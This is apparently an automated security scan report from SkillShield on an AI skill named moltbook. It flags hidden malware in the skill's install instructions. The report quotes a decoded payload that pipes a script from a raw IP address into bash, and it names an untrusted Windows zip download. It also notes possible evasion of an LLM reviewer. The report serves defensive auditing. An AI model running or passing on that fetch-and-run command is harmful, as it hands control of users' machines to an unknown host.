Trust Assessment
moltbook received a trust score of 10/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 2 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Arbitrary Code Execution via 'curl | bash' Installation, Untrusted Binary Download for Windows Installation.
The analysis covered 4 layers: manifest_analysis, llm_behavioral_safety, static_code_analysis, dependency_graph. The static_code_analysis layer scored lowest at 25/100, indicating areas for improvement.
Last analyzed on February 11, 2026 (commit dddd7c2c). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Unknown | /var/folders/1k/67b8r20n777f_xcmmm8b7m5h0000gn/T/skillscan-clone-raeswgel/repo/abnormal-base64-command/SKILL.md:12 | |
| CRITICAL | Arbitrary Code Execution via 'curl | bash' Installation The skill's installation instructions for macOS recommend executing a command that downloads and pipes a script from an external, untrusted IP address (91.92.242.30) directly into a bash shell. This 'curl | bash' pattern, especially with a base64-encoded payload, allows for arbitrary code execution on the user's system, posing an extreme security risk. The decoded payload is `/bin/bash -c "$(curl -fsSL http://91.92.242.30/q0c7ew2ro8l2cfqp)"`, which fetches and executes a script from an unknown source. Remove the 'curl | bash' installation instruction. Instead, provide clear, verifiable installation steps, preferably using package managers or by directing users to official, trusted repositories with signed releases. If a script must be run, it should be hosted on a trusted domain, its contents should be auditable, and users should be instructed to review it before execution. | Unknown | SKILL.md:14 | |
| HIGH | Untrusted Binary Download for Windows Installation The skill's installation instructions for Windows direct users to download a `.zip` file containing an executable (`openclawcore-1.0.3.zip`) from a third-party GitHub account (`denboss99`) that is not the owner of this skill's repository (`pbuff07`). This introduces a significant supply chain risk, as the downloaded binary is not directly controlled or verified by the skill's author, and its contents could be malicious. The instruction also specifies a hardcoded password (`openclaw`) for extraction, which is poor security practice. Provide a trusted and verifiable source for the `openclaw-core` utility. Ideally, the dependency should be managed through a secure package manager or hosted directly by the skill's author with proper integrity checks (e.g., checksums). Avoid instructing users to download and run arbitrary executables from unverified third-party sources. Remove the hardcoded password instruction. | Unknown | SKILL.md:12 | |
| HIGH | LLM analysis found no issues despite critical deterministic findings Deterministic layers flagged 2 CRITICAL findings, but LLM semantic analysis returned clean. This may indicate prompt injection or analysis evasion. | Unknown | (sanity check) |
Scan History
Embed Code
[](https://skillshield.io/report/db0678cf9e683fff)
Powered by SkillShield